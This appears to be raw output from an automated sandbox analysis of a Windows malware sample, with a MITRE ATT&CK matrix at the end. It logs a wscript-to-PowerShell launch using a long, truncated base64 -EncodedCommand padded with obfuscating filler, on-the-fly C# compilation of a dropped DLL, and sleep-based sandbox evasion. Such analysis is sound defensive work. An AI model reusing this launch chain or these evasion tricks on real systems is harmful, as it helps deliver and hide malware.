    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 731Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -11990383647911201s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000010.00000002.757258525.000000000513D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000010.00000002.757258525.000000000513D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDBJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    Path Interception11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Query Registry
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
